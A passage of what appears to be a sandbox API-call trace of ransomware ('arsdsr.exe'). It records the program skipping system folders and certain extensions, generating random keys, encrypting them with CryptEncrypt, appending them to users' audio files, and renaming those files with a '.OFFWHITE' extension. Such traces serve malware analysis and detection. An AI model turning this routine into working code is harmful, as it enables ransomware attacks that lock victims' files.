(lpString1=".mp3", lpString2=".url") returned -1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0134.889] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef64f7e0, ftCreationTime.dwHighDateTime=0x1d5e796, ftLastAccessTime.dwLowDateTime=0xd3703690, ftLastAccessTime.dwHighDateTime=0x1d5ddea, ftLastWriteTime.dwLowDateTime=0xd3703690, ftLastWriteTime.dwHighDateTime=0x1d5ddea, nFileSizeHigh=0x0, nFileSizeLow=0x5c2, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="J708i2ZnnH9.m4a", cAlternateFileName="J708I2~1.M4A")) returned 1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2=".") returned 1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="..") returned 1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="...") returned 1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="windows") returned -1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="$recycle.bin") returned 1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="rsa") returned -1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="ntuser.dat") returned -1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="programdata") returned -1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="appdata") returned 1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="program files") returned -1 [0134.889] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="program files (x86)") returned -1 [0134.890] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.890] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="J708i2ZnnH9.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a" [0134.890] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.890] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.890] PathFindExtensionW (pszPath="J708i2ZnnH9.m4a") returned=".m4a" [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.890] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.890] lstrcmpiW (lpString1="J708i2ZnnH9.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.890] GetProcessHeap () returned 0x500000 [0134.890] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531810 [0134.890] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\j708i2znnh9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.892] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=1474) returned 1 [0134.892] GetProcessHeap () returned 0x500000 [0134.892] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.892] GetProcessHeap () returned 0x500000 [0134.892] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.892] GetProcessHeap () returned 0x500000 [0134.892] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.892] GetProcessHeap () returned 0x500000 [0134.892] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.892] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.892] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.892] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.892] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.892] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.892] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.892] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.892] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.892] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.893] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.893] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.893] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.893] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x5c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.893] SetLastError (dwErrCode=0x0) [0134.893] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.895] GetLastError () returned 0x0 [0134.895] GetLastError () returned 0x0 [0134.895] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.895] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.895] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.895] WriteFile (in: hFile=0x218, lpBuffer=0x531810*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531810*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.895] GetProcessHeap () returned 0x500000 [0134.895] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5c2) returned 0x546980 [0134.895] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.895] ReadFile (in: hFile=0x218, lpBuffer=0x546980, nNumberOfBytesToRead=0x5c2, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295d1c0*=0x5c2, lpOverlapped=0x0) returned 1 [0134.896] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.896] WriteFile (in: hFile=0x218, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5c2, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295d1cc*=0x5c2, lpOverlapped=0x0) returned 1 [0134.896] GetProcessHeap () returned 0x500000 [0134.896] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0134.896] CloseHandle (hObject=0x218) returned 1 [0134.897] GetProcessHeap () returned 0x500000 [0134.897] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.897] GetProcessHeap () returned 0x500000 [0134.897] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.897] GetProcessHeap () returned 0x500000 [0134.897] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.897] GetProcessHeap () returned 0x500000 [0134.897] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.898] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a" [0134.898] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a.OFFWHITE" [0134.898] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\j708i2znnh9.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\J708i2ZnnH9.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\j708i2znnh9.m4a.offwhite")) returned 1 [0134.898] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea22e2e0, ftCreationTime.dwHighDateTime=0x1d5e009, ftLastAccessTime.dwLowDateTime=0x40591a20, ftLastAccessTime.dwHighDateTime=0x1d5e7d1, ftLastWriteTime.dwLowDateTime=0x40591a20, ftLastWriteTime.dwHighDateTime=0x1d5e7d1, nFileSizeHigh=0x0, nFileSizeLow=0x18bb8, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="KpUdTBJb3w3GrYz.wav", cAlternateFileName="KPUDTB~1.WAV")) returned 1 [0134.898] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2=".") returned 1 [0134.898] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="..") returned 1 [0134.898] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="...") returned 1 [0134.898] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="windows") returned -1 [0134.898] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="$recycle.bin") returned 1 [0134.899] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="rsa") returned -1 [0134.899] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="ntuser.dat") returned -1 [0134.899] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="programdata") returned -1 [0134.899] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="appdata") returned 1 [0134.899] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="program files") returned -1 [0134.899] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="program files (x86)") returned -1 [0134.899] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.899] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="KpUdTBJb3w3GrYz.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav" [0134.899] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.899] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.899] PathFindExtensionW (pszPath="KpUdTBJb3w3GrYz.wav") returned=".wav" [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0134.899] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0134.900] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0134.900] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0134.900] lstrcmpiW (lpString1="KpUdTBJb3w3GrYz.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.900] GetProcessHeap () returned 0x500000 [0134.900] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531820 [0134.900] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\kpudtbjb3w3gryz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.901] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=101304) returned 1 [0134.901] GetProcessHeap () returned 0x500000 [0134.901] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.901] GetProcessHeap () returned 0x500000 [0134.901] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.901] GetProcessHeap () returned 0x500000 [0134.901] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.901] GetProcessHeap () returned 0x500000 [0134.901] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.901] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.901] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.901] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.902] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.902] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.902] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.902] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.902] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.902] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.902] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.902] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.902] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.902] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x18bb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.902] SetLastError (dwErrCode=0x0) [0134.902] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.904] GetLastError () returned 0x0 [0134.904] GetLastError () returned 0x0 [0134.904] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x18cb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.904] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.905] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x18db8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.905] WriteFile (in: hFile=0x218, lpBuffer=0x531820*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531820*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.905] GetProcessHeap () returned 0x500000 [0134.905] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18bb8) returned 0x55c7c8 [0134.905] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.905] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x18bb8, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x18bb8, lpOverlapped=0x0) returned 1 [0134.912] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.912] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x18bb8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x18bb8, lpOverlapped=0x0) returned 1 [0134.913] GetProcessHeap () returned 0x500000 [0134.913] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.913] CloseHandle (hObject=0x218) returned 1 [0134.915] GetProcessHeap () returned 0x500000 [0134.915] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.915] GetProcessHeap () returned 0x500000 [0134.915] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.915] GetProcessHeap () returned 0x500000 [0134.915] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.915] GetProcessHeap () returned 0x500000 [0134.915] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.915] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav" [0134.915] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav.OFFWHITE" [0134.915] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\kpudtbjb3w3gryz.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\KpUdTBJb3w3GrYz.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\kpudtbjb3w3gryz.wav.offwhite")) returned 1 [0134.916] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12575e0, ftCreationTime.dwHighDateTime=0x1d5de2f, ftLastAccessTime.dwLowDateTime=0x182115f0, ftLastAccessTime.dwHighDateTime=0x1d5dfaf, ftLastWriteTime.dwLowDateTime=0x182115f0, ftLastWriteTime.dwHighDateTime=0x1d5dfaf, nFileSizeHigh=0x0, nFileSizeLow=0x8c11, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="of3LtF9siYb.m4a", cAlternateFileName="OF3LTF~1.M4A")) returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2=".") returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="..") returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="...") returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="windows") returned -1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="$recycle.bin") returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="rsa") returned -1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="ntuser.dat") returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="programdata") returned -1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="appdata") returned 1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="program files") returned -1 [0134.916] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="program files (x86)") returned -1 [0134.916] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.916] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="of3LtF9siYb.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a" [0134.916] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.917] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.917] PathFindExtensionW (pszPath="of3LtF9siYb.m4a") returned=".m4a" [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.917] 